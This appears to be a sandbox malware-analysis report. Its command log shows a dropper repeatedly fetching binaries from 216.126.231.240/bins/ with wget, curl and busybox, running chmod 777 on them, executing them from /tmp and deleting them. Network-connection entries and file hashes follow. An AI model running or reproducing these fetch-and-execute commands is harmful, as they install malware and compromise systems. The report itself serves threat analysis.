[/bin/busybox wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/chmod
[chmod 777 C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR
[./C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/rm
[rm C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/usr/bin/wget
[wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/chmod
[chmod 777 jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4
[./jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/rm
[rm jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/usr/bin/wget
[wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/chmod
[chmod 777 No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5
[./No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/rm
[rm No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/usr/bin/wget
[wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/chmod
[chmod 777 nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY
[./nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/rm
[rm nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/usr/bin/wget
[wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/chmod
[chmod 777 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W
[./7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/rm
[rm 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/usr/bin/wget
[wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/chmod
[chmod 777 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1
[./6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/rm
[rm 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/usr/bin/wget
[wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/chmod
[chmod 777 pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv
[./pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/rm
[rm pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/usr/bin/wget
[wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/chmod
[chmod 777 IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa
[./IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/rm
[rm IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/usr/bin/wget
[wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/chmod
[chmod 777 L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW
[./L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/rm
[rm L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/usr/bin/wget
[wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/778-1-0xb66f4000-0xb6705044-memory.dmp